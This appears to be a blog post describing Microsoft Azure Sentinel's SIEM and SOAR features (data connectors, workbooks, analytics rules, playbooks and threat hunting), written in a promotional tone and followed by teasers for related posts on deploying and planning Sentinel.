Azure Sentinel- Powerful Security System

By Ashwin Venugopal -

 




Security can be challenging with never-ending sophisticated attacks, excessive volume of social threats, and whatnot; and The Cybersecurity Jobs report 2018-21, by Cybersecurity ventures, stating the expected shortfall of about 3.5M security professional by 2021, further adds to the problems for security operations teams. But Azure Sentinel can be helpful to counter these issues.

Microsoft Azure Sentinel is a flexible, cloud-native, Security Information Event Management (SIEM), and Security Orchestration Automated Response (SOAR) solution providing a one-stop solution for security threats, threat visibility, proactive hunting, and threat response. It uses the power of Artificial Intelligence the recognize security threats and subdue them further. With Azure Sentinel, you can enjoy affordable security services without any hidden prices.

Microsoft Azure Sentinel

Microsoft Azure Sentinel combines the power of the cloud and Artificial Intelligence to help identify the security threats and stop them before they can cause any harm. By integrating with Microsoft 365 solutions, it can enable the following services:

  •  Collect data at cloud scale across all users, devices, applications, and infrastructure both on-premises and in multiple clouds.
  •  Detect previously undetected threats, and minimize false positives using Microsoft’s analytics and unparalleled threat intelligence.
  •  Investigate threats with artificial intelligence, and hunt for suspicious activities at scale, tapping into years of cybersecurity work at Microsoft.
  • Respond to incidents rapidly with built-in orchestration, and automation of common tasks.

Azure Sentinel enables you to bring your threat intelligence, by improving your threat detection and protection with the help of Artificial Intelligence.

Data Connection Methods

Microsoft Azure Sentinel is capable of connecting with your security services through its various data connection methods including service-to-service integration (Amazon Web Services, Azure Security Center, Windows Firewall, etc.), via API, and agent. It enables you to import your data security threats and customize threat detection and alert rules. Whether it is any type of data threat, we will never disappoint you.

Service to service integration- Some services such as AWs, Microsoft services, etc. can be locally connected granting extraordinary integration. Other easily connectable solutions are Azure Activity, Azure Security Center, Cloud App Security, Windows firewall, Microsoft 365, and many more.

External Solutions via API- Some data sources can be connected using Application Programming Interface (APIs) through which event logs can be retrieved to gather specific data types and then send them to Azure Log Analytics.

External Solutions via Agent- Azure Sentinel Agent based on Log Analytics agent is capable of converting CEF formatted logs into a simpler format which can be easily consumed by Log Analytics. The particular agent can be installed either directly in the appliance or through a Linux server, depending upon the appliance type.

The agent can be deployed automatically or manually on a dedicated machine (VM or on-premises) to enable easy communication between the appliance and Azure Sentinel. Automatic agent deployment can only be done if your machine is a new VM, otherwise, the agent can be easily deployed manually on an existing Azure VM, VM in another cloud, an on-premises machine.

We are collaborating with various partners in the Microsoft Intelligent Security Association, including Palo Alto, F5, Accenture, Symentec, and many more. Our customers are always satisfied with our services. For example, Andrew Winkelmann, Global Consulting Practice Lead, Accenture said in an interview that “With Microsoft Azure Sentinel, we can better address the main SIEM landscape challenges for our clients, along with simplifying data residency and GDPR concerns.”

Hence, with Microsoft Azure Sentinel you can enjoy a 100% customer satisfaction guarantee without breaking a sweat.

 

Workbooks

After connecting with Azure Sentinel you can monitor your data using our versatile Azure Monitor workbooks. Workbooks always help in situations like-

·         Exploring the usage of Azure Sentinel.

·         Explaining to your team how a newly released feature will work.

·         Sharing the results of your experiments with other team members.

·         Reporting the impact of an outage on overall functioning.

Saving & Sharing Workbooks with your team

Workbooks can be saved either in the My Reports section or the Shared Reports section depending upon your requirements and can be easily shared by a link or email, but the recipients should have access and contributor’s permission to this resource in Azure Sentinel to view and edit the Workbook.

Analytics & Incidents

Azure Sentinel uses analytics to correlate alerts into incidents, which are a group of related alerts that together create an actionable possible threat needed to be investigated and resolved. This combination helps you to minimize the noise and the number of alerts you have to review and investigate.

You can use the built-in rules within Azure Sentinel to choose the Microsoft security solutions to create incidents in real-time.

 

Using Microsoft Security Incident creation analytic rules

Azure Sentinel Incidents can be automatically created by using the built-in rules available in Azure Sentinel to choose Microsoft Security solutions for the same. You can also edit the rules to define more specific options to create Incidents in Azure Sentinel.

For example- you can choose to create Azure Sentinel Incidents automatically only from high-severity Security Center alerts.

You can also create more than one Microsoft Security analytic rule per service type and since each rule works as a filter it will not create any duplicate incidents. You can also select the alerts from the security solution to automatically generate incidents in Azure Sentinel, when you connect a Microsoft Security solution.

Playbooks

Security automation & orchestration

Playbooks can easily integrate with Azure services as well as the existing tools which can help you to automate your common tasks and simplify security orchestration. Azure Sentinel’s automation and orchestration solution provides a highly-extensible architecture that enables scalable automation as new threats emerge. You can build playbooks with Azure Logic Apps and choose from a growing gallery of built-in playbooks. The connection will allow you to apply any custom logic in code, ServiceNow, Jira, Zendesk, HTTP requests, Microsoft Teams, Slack, Windows Defender ATP, and Cloud App Security.

For example- If you are using ServiceNow ticketing system, you can always use the tools provided to use Azure Logic Apps to automate your workflows and also open a ticket in ServiceNow each time a particular event is detected.

Investigation & Hunting

Azure Sentinel’s investigating tools help analyze and investigate the root cause of a potential threat. Based on the MITRE framework Azure Sentinel’s powerful hunting tools will help you hunt down the threats even before an alert is triggered. For example one built-in query may provide data about many uncommon processes running on your infrastructure and you would not want alert every time they run.

Use the Investigation graph to deep dive

The investigation graph offers you:

·         Visual context from raw data- It displays the entity relationships extracted automatically from the raw    data and enables you to easily view connections across different data sources.

·         Full investigation scope discovery- It will expand your scope of investigation by using in-built                exploration queries to surface the full scope of breach.

·         Built-in investigation steps- It uses predefined exploration options to make sure you are asking the         right question in the face of a threat.

Hunting

Azure Sentinel hunting is capable of providing following advantages:

  • Built-in queries- The starting page provides you with preloaded query examples designed to help  you to get started and be familiar with the tables and the query language.   
  •  Powerful query language with IntelliSense- The query language will provide you the flexibility     needed to take the hunting to the next level.
  •   Create your own bookmarks- You can use the bookmark functionality to mark any matches or       findings that seems unusual or suspicious and can come back to them in future.
  •  Use notebook to automate investigation- They are like playbooks that can be built to walk through the steps of an investigation and hunt. Notebooks can easily combine all the hunting steps in a reusable playbook that can also be shared with others in your organization.
  •  Query the stored data- You can access the data in tables to query, like you can query the process  creation, DNS events, and many other event types.
  •  Links to community- You can also borrow the power of the greater community to find additional  queries and data sources. 

 Community

The Azure Sentinel Community is the best resource for threat detection and automation. Our Microsoft security analysts constantly add new workbooks, hunting queries, etc. sample content can be downloaded from the private company GitHub repository to make your custom workbooks, hunting queries, notebooks, etc. for Azure Sentinel.

 

Comments

Post a Comment

Popular posts from this blog

Deployment (Part 3)

By Ashwin Venugopal -
Image
  To read part 1, please click  here To read part 2, please click  here Microsoft Monitoring Agent (MMA) MMA is used across multiple Microsoft solutions and has undergone a few name changes as its features and functionality have evolved. If it is being considered to be used, then following areas should be covered during a Microsoft Sentinel deployment project: Consider the timelines and the strategy for a migration to AMA (Azure Monitor Agent) before the MMA end-of-life.  Consider the central deployment and management methodology for MMA. Determine which endpoints are in scope for deployment as these affect the log ingestion volume significantly.  Azure Monitor Agent (AMA) Organizations with MMA as the main Microsoft Sentinel agent should start planning the migration to AMA as soon as possible to avoid a rushed migration. One of the main advantages of AMA is the ability to control the log collection policy centrally and apply different policies against different groups of computers, re
Read more

Project Resourcing (Part 2)

By Ashwin Venugopal -
Image
  To read part 1, please click  here Engineering - SIEM The SIEM engineers configures Microsoft Sentinel, including Log Analytics, Logic Apps, workbooks, and playbooks. They are also responsible for the following high-level tasks: Initial configuration of Azure tenant, including provisioning required resources, assigning access roles, and configuring workspace parameters like log retention, resource tagging, and blueprints.  Deployment and configuration of syslog/CEF log collection agents in appropriate locations to collect logs from on-premises devices. Generally, it will be joint effort of both system engineer and SIEM engineer, involving configuration and potential troubleshooting.  Working with system owners to enable log forwarding and configuring any required parsing of log data in Log Analytics.  Working with security operations to create and deploy KQL analytic rules to offer detections for SOC/Computer Security Incident Response Team (CSRIT) use. Tuning of alert rule parameter
Read more

Design Planning (Part 3)

By Ashwin Venugopal -
Image
  To read part 1, please click  here To read part 2, please click  here Complex Organizational Structures SIEM can be an expensive security control, hence, it is common multiple businesses to contribute to the overall expense. Various organizational units may require a level of access to specific dashboards or sets of data. Microsoft Sentinel offers the ability to assign table-level permissions and limit the level of access to the minimum required to perform requisite job functions.  Role-based Access Control (RBAC) Requirements Microsoft Sentinel offers an extensive list of Azure built-in roles that can be used to provide granular access according to the job requirements and permitted level of access. Some of them are various Microsoft Sentinel dedicated roles: Microsoft Sentinel Contributor- Can perform all engineering-related configuration, such as creating alert rules, configuring data connectors, and additional similar tasks.  Microsoft Sentinel Reader- Can query the log data stor
Read more